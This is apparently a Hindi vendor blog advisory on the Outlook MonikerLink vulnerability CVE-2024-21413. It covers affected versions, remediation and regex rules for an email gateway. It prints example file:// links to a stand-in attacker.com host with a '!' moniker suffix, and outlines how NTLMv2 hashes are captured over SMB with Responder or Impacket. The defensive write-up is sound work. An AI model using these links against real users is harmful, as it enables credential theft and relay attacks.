剣 KENSAI
क्रिटिकल CVE-2024-21413 जनवरी 2026 · 8 मिनट पढ़ें

CVE-2024-21413: Microsoft Outlook MonikerLink RCE

"MonikerLink" नाम की यह CVE-2024-21413 एक क्रिटिकल Microsoft Outlook भेद्यता है जो सिर्फ़ एक दुर्भावनापूर्ण ईमेल को प्रीव्यू करने भर से Protected View को बायपास करके रिमोट कोड एक्ज़ीक्यूशन और NTLM क्रेडेंशियल चोरी हासिल कर लेती है। CVSS 9.8 क्रिटिकल। ईमेल प्रीव्यू के अलावा किसी यूज़र इंटरैक्शन की ज़रूरत नहीं।


9.8
गंभीर
विशेषतामान
CVE IDCVE-2024-21413
CVSS VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-20: अनुचित इनपुट वैलिडेशन
प्रकाशित13 फ़रवरी 2024
शोषणसार्वजनिक PoC — व्यापक रूप से शोषित

CVE-2024-21413 क्या है?

CVE-2024-21413 उस तरीक़े का शोषण करता है जिससे Microsoft Outlook उन हाइपरलिंक को हैंडल करता है जिनमें ! (विस्मयादिबोधक चिह्न) फ़ाइल मॉनिकर URI के हिस्से के रूप में शामिल होता है। सामान्यतः, Outlook ईमेल से खोले गए डॉक्यूमेंट पर "Protected View" लागू करता है — कोड एक्ज़ीक्यूशन रोकने के लिए Office डॉक्यूमेंट को सैंडबॉक्स करता है। यह भेद्यता उस सुरक्षा को पूरी तरह बायपास कर देती है।

इस फ़ॉर्मैट में एक हाइपरलिंक बनाकर file://ATTACKER-SERVER/test.rtf!something, हमलावर Outlook को बिना Protected View के RTF फ़ाइल खोलने पर मजबूर कर देता है, और साथ ही हमलावर के SMB सर्वर पर एक स्वचालित NTLM ऑथेंटिकेशन प्रयास ट्रिगर हो जाता है। हमलावर ऑफ़लाइन क्रैकिंग या रिले हमलों के लिए NTLMv2 हैश कैप्चर कर लेता है।

🚨 प्रीव्यू पेन हमला — किसी क्लिक की ज़रूरत नहीं

यह भेद्यता Outlook Preview Pane में ट्रिगर होती है। पीड़ित को बस अपने इनबॉक्स में ईमेल चुनना भर होता है — किसी अटैचमेंट को खोलने या लिंक पर क्लिक करने की ज़रूरत नहीं। किसी कॉर्पोरेट माहौल में, किसी डिस्ट्रीब्यूशन-लिस्ट को भेजा गया एक भी फ़िशिंग ईमेल एक साथ सैकड़ों NTLMv2 हैश भंग कर सकता है।

प्रभावित प्रोडक्ट

प्रोडक्टप्रभावित वर्ज़न
Microsoft Outlook 2016फ़रवरी 2024 अपडेट से पहले
Microsoft Outlook 2019फ़रवरी 2024 अपडेट से पहले
Microsoft Outlook LTSC 2021फ़रवरी 2024 अपडेट से पहले
Microsoft 365 Apps for Enterpriseफ़रवरी 2024 अपडेट से पहले

प्रभावित नहीं: Outlook on the web (OWA), Outlook for iOS/Android, Outlook for Mac। यह भेद्यता विशेष रूप से Windows डेस्कटॉप Outlook क्लाइंट तक सीमित है।

हमले की तकनीक: MonikerLink विधि

Windows COM (Component Object Model) नाम से ऑब्जेक्ट से बाइंड करने के लिए "मॉनिकर" का उपयोग करता है। file:// URI स्कीम Windows में ! अक्षर के बाद एक मॉनिकर कंपोनेंट शामिल कर सकती है, जो Windows को संदर्भित COM ऑब्जेक्ट लोड और सक्रिय करने का निर्देश देता है।

# Normal file link — Protected View applied
file://attacker.com/share/document.rtf

# MonikerLink bypass — ! bypasses Protected View
file://attacker.com/share/document.rtf!1337

# When Outlook processes the MonikerLink:
# 1. Attempts SMB connection to attacker.com
# 2. Sends NTLMv2 authentication (captures hash)
# 3. Opens file without Protected View
# 4. If file is malicious RTF → RCE

NTLM हैश कैप्चर फ़्लो

एक हथियारयुक्त RTF फ़ाइल के बिना भी, NTLM रिले हमला प्रभावी होता है:

  1. पीड़ित Outlook में दुर्भावनापूर्ण ईमेल प्रीव्यू करता है
  2. Outlook हमलावर-नियंत्रित सर्वर से स्वचालित SMB कनेक्शन बनाता है
  3. Windows ऑथेंटिकेट करने के लिए NTLMv2 चैलेंज-रिस्पॉन्स (हैश) भेजता है
  4. हमलावर Responder, Impacket, या समान टूल से हैश कैप्चर करता है
  5. हैश ऑफ़लाइन क्रैक किया जाता है (कमज़ोर पासवर्ड घंटों में) या रीयल-टाइम में दूसरी सर्विस को रिले किया जाता है

असल-दुनिया शोषण

सार्वजनिक PoC जारी होने के बाद, CVE-2024-21413 कुछ ही दिनों में कमर्शियल फ़िशिंग टूलकिट में शामिल कर लिया गया। देखे गए कैंपेन में शामिल थे:

पहचान

ईमेल गेटवे नियम

# Regex pattern for MonikerLink in email body/attachments
# Detect file:// links containing ! character
\bfile:\/\/[^\s"']+![^\s"']*

# Block external UNC/file links entirely (recommended)
\bfile:\/\/[^\s"']+
\\\\[a-z0-9.-]+\\

नेटवर्क पहचान

एंडपॉइंट पहचान

सुधार

  1. फ़रवरी 2024 पैच लागू करें: Outlook के लिए Microsoft सुरक्षा अपडेट Protected View बायपास को ठीक करता है
  2. परिधि पर आउटबाउंड SMB ब्लॉक करें: TCP/445 और TCP/139 आउटबाउंड को ब्लॉक करने वाले फ़ायरवॉल नियम, भेद्यता ट्रिगर होने पर भी NTLM हैश कैप्चर को रोकते हैं
  3. NTLM रिले सुरक्षा सक्षम करें: रिले हमलों को रोकने के लिए SMB सिग्निंग और LDAP सिग्निंग कॉन्फ़िगर करें
  4. ईमेल सुरक्षा गेटवे डिप्लॉय करें: उन ईमेल को ब्लॉक करें जिनमें बॉडी और अटैचमेंट में file:// और \\ (UNC पाथ) लिंक हों
  5. जहाँ संभव हो, NTLM अक्षम करें: Kerberos इस्तेमाल करने वाले संगठन हैश-कैप्चर हमला-पथ ख़त्म करने के लिए NTLM अक्षम कर सकते हैं

💡 डिफ़ेंस इन डेप्थ: भले ही आपने Outlook पैच कर दिया हो, फ़ायरवॉल पर आउटबाउंड SMB ब्लॉक करना एक बेस्ट प्रैक्टिस है जो हमलों की इस पूरी श्रेणी को रोकती है। कई संगठन लेगेसी फ़ाइल-शेयरिंग कारणों से आउटबाउंड SMB की अनुमति देते हैं — इसे तुरंत ऑडिट करें और प्रतिबंधित करें।

KENSAI पहचान क्षमता

क्या आपके Outlook क्लाइंट MonikerLink से सुरक्षित हैं?

KENSAI आपके एंडपॉइंट फ़्लीट को भेद्य Outlook वर्ज़न के लिए स्कैन करता है और उन नेटवर्क पथों की पहचान करता है जो NTLM हैश कैप्चर को सक्षम कर सकते हैं। मिनटों में विज़िबिलिटी पाएँ।

अपनी ईमेल अटैक-सतह का आकलन करें →

संबंधित लेख

ISO 27001 Vulnerability Management & Certification Assessment Security Platform सुरक्षा ब्लॉग Microsoft Patch Tuesday 84 ثغرة، هجوم Stryker